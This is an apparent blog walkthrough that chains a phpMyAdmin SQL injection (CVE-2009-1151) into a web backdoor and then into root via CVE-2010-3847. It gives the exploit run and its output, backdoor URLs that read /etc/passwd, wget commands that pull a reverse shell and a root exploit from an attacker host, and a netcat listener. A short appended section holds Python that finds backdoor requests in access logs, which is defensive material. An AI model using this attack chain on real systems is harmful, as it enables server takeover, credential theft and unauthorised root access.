phpMyAdmin SQL injection vulnerability
phpMyAdmin SQL injection vulnerability in versions 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
PHPMYADMIN SQL INJECTION
CVE: CVE-2009-1151
Remote: Yes
Local: No
ROOT
CVE: CVE-2010-3847
Remote: No
Local: Yes
Download the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257
1) Run the exploit against the target machine.
[root@bt]# ./php_exploit http://mytargettest.com/phpMyAdmin/
[+] checking if phpMyAdmin exists on URL provided …
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() …
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
2) Great, that means it worked. Now you can run commands on the target machine.
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test (Make sure you can write in there and that the file is there.)
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell (Download your rev_shell)
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell (change the permissions to execute)
3) Now your exploit is on the target machine and ready to run. This exploit is just a reverse shell, so on my machine I run this:
nc -l -p 8080 -vvv
4) Now I execute my reverse shell to connect to my machine
http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
5) Great, now you have a shell. The next step is to get root.
id
6) cd /tmp/ ; mkdir hack ; cd hack
wget http://172.16.1.79/exploits/get_root
wget http://172.16.1.79/exploits/payload.c
7) Run the exploit to get root and that’s it.
chmod +x ./get_root
./get_root
id
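A defender's view of steps 1 and 2, as an added example that is not part of the original post: the injected config file answers to the c and p query parameters, so any request for config/config.inc.php that carries either one is a strong indicator of compromise in the web server access log. The log lines below are constructed, and the Apache combined log format and the function name are assumptions.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample lines (Apache combined log format is an assumption).
SAMPLE_LOG = """\
198.51.100.7 - - [09/Dec/2015:10:01:02 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Dec/2015:10:01:09 +0000] "GET /phpMyAdmin//config/config.inc.php?c=ls+-l+/ HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Dec/2015:10:01:30 +0000] "GET /phpMyAdmin//config/config.inc.php?p=phpinfo(); HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
203.0.113.20 - - [09/Dec/2015:10:02:00 +0000] "GET /phpMyAdmin/config/config.inc.php HTTP/1.1" 200 0 "-" "curl/7.40"
203.0.113.20 - - [09/Dec/2015:10:02:05 +0000] "GET /shop/list.php?c=12&p=2 HTTP/1.1" 200 900 "-" "curl/7.40"
"""

# Captures: client IP, timestamp, method, request target, status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Parameters the injected config file answers to in the walkthrough above.
BACKDOOR_PARAMS = {"c", "p"}


def find_backdoor_hits(log_text):
    """Return one record per request passing c= or p= to config/config.inc.php."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m["target"].partition("?")
        # Collapse repeated slashes: the walkthrough URLs use "phpMyAdmin//config".
        path = re.sub(r"/+", "/", unquote(path)).lower()
        if not path.endswith("/config/config.inc.php"):
            continue  # same parameter names on other scripts are not flagged
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            name = unquote_plus(name)
            if name in BACKDOOR_PARAMS:
                hits.append({"ip": m["ip"], "time": m["ts"], "param": name,
                             "value": unquote_plus(value),
                             "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in find_backdoor_hits(SAMPLE_LOG):
        print("{time} {ip} {param}={value!r} -> HTTP {status}".format(**hit))
```

The decoded value shows which command or PHP expression was submitted, which helps scope what ran on the host during incident response.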
Reviewed by Unknown on 12/09/2015